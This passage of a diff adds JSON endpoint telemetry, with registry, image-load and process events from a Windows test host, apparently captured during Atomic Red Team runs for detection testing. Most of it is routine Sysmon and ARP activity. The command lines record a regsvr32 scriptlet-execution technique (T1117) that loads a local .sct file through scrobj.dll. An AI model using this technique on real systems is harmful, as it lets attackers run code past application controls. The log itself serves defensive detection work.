"registry_value": "Parameters", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "registry", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\WINDOWS\\system32\\ARP.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\RFC1156Agent\\CurrentVersion\\Parameters", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\RFC1156Agent\\CurrentVersion\\Parameters\\TrapPollTimeMilliSecs", + "registry_value": "TrapPollTimeMilliSecs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "image_load", + "image_name": "dhcpcsvc6.dll", + "image_path": "C:\\Windows\\System32\\dhcpcsvc6.dll", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "dhcpcsvc.dll", + "image_path": "C:\\Windows\\System32\\dhcpcsvc.dll", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "inetmib1.dll", + "image_path": "C:\\Windows\\System32\\inetmib1.dll", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "process", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "subtype": "terminate", + "timestamp": 131883573233240000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "file", + "file_name": "ARP.EXE-6A72334A.pf", + "file_path": "C:\\Windows\\Prefetch\\ARP.EXE-6A72334A.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573233240000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "process", + "pid": 2008, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573233240000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4768, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573233400000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4768, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573233390000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4768, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573233390000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4768, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573233390000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4768, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573233390000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4768, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573233390000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}" + }, + { + "event_type": "process", + "pid": 4768, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573233390000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7980, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573235480000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573235420000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573235420000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573235420000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573235420000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573235420000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" + }, + { + "command_line": "regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3596, + "ppid": 7980, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "subtype": "create", + "timestamp": 131883573235570000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}", + "unique_ppid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\System32\\apphelp.dll", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 